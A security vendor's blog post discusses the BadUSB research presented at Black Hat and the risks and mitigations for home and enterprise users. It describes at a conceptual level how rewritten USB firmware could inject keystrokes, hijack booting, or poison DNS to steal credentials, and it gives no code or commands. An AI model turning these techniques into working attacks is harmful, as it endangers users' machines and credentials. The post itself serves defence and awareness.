Every year, thousands of hackers and security researchers from around the world descend on Las Vegas to attend the annual Black Hat security conference. The conference boasts top notch security presentations from industry leaders – often centered on breaking computer security. Although many of the presentations are on breaking things, most of the attendees and presenters are in fact using the knowledge for good – to design more secure software, better secure their organization, or fix the security problems pointed out by the researchers.

For me this year, one particular presentation stood out as important in the future of antimalware protection. Karsten Nohl and Jokob Lell from SRLabs took to the stage in a packed hall to discuss attacks that can be carried out by computer accessories. You can find a recording of their presentation available on YouTube:

BadUSB - On Accessories that Turn Evil (YouTube video)
By Kasten Nohl, Sascha Kriβler, and Jakob Lell

USB is a common industry standard for connecting peripherals like keyboards, webcams, and thumb drives to computers. During their presentation, the researchers illustrated a serious problem in how many USB devices are implemented. USB peripherals run their own processor and firmware to talk to the PC they are connected to, and the problems arise when the firmware on the USB peripheral is changed to be malicious. All major platforms such as Windows, Mac OS X, and Linux are affected since these problems are in the USB devices themselves, not the platforms they are connected to.

From the antimalware perspective, a problem arises if the firmware for a USB peripheral can be overwritten with new firmware from actors other than the manufacturer without the user making a physical change to the device (eg. flip a physical switch on the device). Unfortunately, the researchers showed that for many common USB thumb drives, software on the machine connected to the USB thumb drive can rewrite the firmware with code not from the manufacturer without any physical changes. In essence, this means malware can rewrite USB thumb drive firmware.

Ok, so now we know malware can rewrite USB thumb drive firmware and probably other devices as well, but is this a problem? Yes, but I'll explain at the end of this blog why this isn't an immediate problem for home users yet and how enterprise users can mitigate the risk.

Malware can overwrite the firmware to act maliciously and infect machines it is connected to. Although malware can overwrite the firmware with some USB peripherals, the firmware itself is often specific to each manufacturer and model.

For malware to spread as a worm using multiple models of USB peripherals would take a significant resource investment. For this reason, we don't believe there will be an effective malware worm spreading using this approach shortly.

The researchers proposed several ways a malicious firmware can propagate like a worm upon overwriting the firmware:

  1. The USB peripheral (eg. USB thumb drive) can change its device type at any time to become a keyboard. This allows the firmware to send a series of particularly crafter keystrokes to quickly download and install a virus on the computer it is connected to.
    In their demonstration, this takes almost two seconds to carry out and would be clearly visible to the PC's user that something occurred, and this requires a user to be logged in to the PC at the time of the attack.
  2. During the PC's boot-up, the USB thumb drive can recognize this and change into a bootable device to take over the machine.
    This requires a USB device to be higher in the boot order than the regular hard drive, which is not the default on many PCs. A USB keyboard can be emulated during boot to change the boot order, but this process is highly dependent on the make and model of the machine. For these reasons, this method does not appear to be a big risk.
  3. Content on the thumb drive can be controlled at access time. For example, if the device can distinguish between the two types of access, the thumb drive could provide good content to the antimalware software when scanned, but provide malicious content when opened by the user.
  4. It exposes a large driver attack surface for exploiting, since a USB device can choose to interface with many different drivers. In the future this could infect machines when they're plugged in.
  5. The network connection can be modified by man-in-the-middle techniques by pretending to be a network card connected by USB and replying to DHCP queries with a malicious DNS server while letting the Internet traffic flow through the normal adapter. It looks like any network adapter (not just the default Internet interface) can perform DHCP DNS poisoning. This can allow for credentials to be stolen from the user's browser session, and can allow for malware to be loaded onto the machine from infecting downloaded binaries in transit.

By design, any hardware firmware is relied upon to read the contents of the firmware itself, meaning that antimalware software is unable to fully scan a USB thumb drive or its firmware for infections. Antimalware software can, however, prevent and detect malware trying to rewrite the firmware of USB peripherals. It also has the ability to protect against malware running on the computer just before or after infection by a malicious USB peripheral; just like any other malware propagation. As the presenters pointed out, the solution to the USB peripherals problem lies primarily with the device manufacturers. The manufacturers should make USB devices secure by default by either:

  1. Only accepting digitally signed firmware updates from their manufacturer.
  2. Not accepting firmware updates and requiring physical modification to change the firmware – for example, this could be a physical switch on the USB thumb drive to enable rewriting of the firmware.
  3. No accepting firmware updates at all.

These defenses would largely prevent the worm-like propagation of firmware-rewriting malware through USB peripherals.

I encourage anyone interested to watch the presentation for more details.

Implications to home users

Don't go throwing out your USB thumb drives and peripherals just yet. Until we start seeing malware actively using these techniques, home users have little to be afraid of. We hope awareness created around this issue will help drive device manufacturers to release firmware updates for problematic USB peripherals to no longer accept firmware updates that are not signed, or disable firmware updates entirely. Some USB peripherals may have to be discarded in the future if they become targeted and no manufacturer update is made available.

 

Implications to enterprise users

If any enterprise users require USB thumb drives, they should look into upgrading to a USB model with non-writable firmware or models that require digitally signed firmware updates. Mass storage devices are one of the most important USB peripherals to secure given that they are often plugged into multiple machines over their lifetime.

Employees should be careful of connecting their phones to their enterprise computers by USB (eg. to charge them). Connecting enterprise phones to personal computers should be avoided to reduce their risk of infection. Smartphones running outdated operating systems may be particularly susceptible to an infection that could then carry-out USB attacks on computers they are connected to.

Enterprises with highly sensitive data may need to evaluate the firmware update process for all the peripheral devices they currently use and are purchasing. Depending on the type of data held by the corporation, the country of manufacture as well as the distribution path of the devices may need to be considered.

Enterprise security software needs to start investing in protecting computers from USB peripherals. A software solution may be able to resist a USB peripheral from changing device types, for example, or detect sequences of keystrokes deemed malicious or too quick to be human-controlled.

Similarly, hardware security USB hubs may be built to enforce device types on USB ports and prevent firmware rewriting – analogous to a traditional network firewall. The USB port that each device is plugged into could define the device types allowed by the USB peripheral. Although this defeats the design advantage of USB, it partially mitigates the risk by preventing USB peripherals from arbitrarily changing their types.

In conclusion, the enterprise security surrounding USB devices is heading towards an overhaul. The process may be painful, but it is necessary.

Geoff McDonald
MMPC